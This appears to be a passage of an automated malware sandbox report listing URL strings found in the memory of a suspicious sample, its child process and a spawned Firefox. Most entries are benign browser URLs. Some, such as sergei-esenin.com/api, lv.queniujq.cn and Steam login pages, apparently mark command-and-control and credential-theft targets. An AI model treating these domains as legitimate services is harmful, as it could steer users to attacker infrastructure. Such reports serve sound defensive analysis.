Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more_determineToolbarAndContentTheme/contentTheme
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morediscoverystream.personalization.override
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 0000001D.00000003.2090715671.000001C96F110000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2283034134.000001C96F110000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001D.00000003.2090715671.000001C96F110000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2283034134.000001C96F110000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001D.00000003.1984164128.000001C966D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985500280.000001C966F60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984524321.000001C966F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985118386.000001C966F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 0000001D.00000002.2122168164.000001C957211000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: file.exe, 00000000.00000003.1460412273.000000000598E000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2051677031.00000000059A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962AAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: firefox.exe, 0000001D.00000002.2310925330.000001C97163A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001D.00000002.2146450702.000001C9657BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 0000001D.00000002.2155269647.000001C967194000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2122168164.000001C957203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%extensions.formautofill.credit
Source: firefox.exe, 0000001D.00000002.2164638288.000001C9675B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steam
Source: 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96409F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2141978410.000001C964321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: firefox.exe, 0000001D.00000002.2122168164.000001C9572D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 0000001D.00000002.2126645860.000001C962BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s4
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001D.00000002.2192132128.000001C9687D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptNaT
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001D.00000002.2126645860.000001C962BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001D.00000003.1985500280.000001C966F60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984524321.000001C966F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985862608.000001C966F7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985118386.000001C966F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001D.00000003.2074345700.000001C968996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1459054551.0000000005986000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2067087798.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2047135073.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2067414853.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2021461230.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2095726575.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2181105344.0000000001119000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2049269933.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2041871349.00000000011AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/
Source: file.exe, 00000000.00000003.1417736971.00000000011AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/$l
Source: 8138ba21a1.exe, 00000012.00000003.2066736978.00000000059AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/.
Source: 8138ba21a1.exe, 00000012.00000003.2067087798.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2047135073.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2067414853.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2049269933.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2041871349.00000000011AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com//
Source: 8138ba21a1.exe, 00000012.00000003.1998433341.0000000001193000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1998252490.0000000001187000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/3
Source: 8138ba21a1.exe, 00000012.00000003.2047135073.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2049269933.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2041871349.00000000011AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/7
Source: file.exe, 00000000.00000003.1458782444.0000000005982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/9
Source: 8138ba21a1.exe, 00000012.00000003.2116513162.00000000011B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/?
Source: file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/F
Source: 8138ba21a1.exe, 00000012.00000003.2067645596.00000000059AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/II
Source: 8138ba21a1.exe, 00000012.00000003.2117059192.000000000119E000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180479528.0000000001192000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2181693561.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2043446372.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2021461230.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2116663478.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2095825871.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2117509341.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2117059192.0000000001191000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2047304849.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2096131872.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2066736978.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2042228537.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api
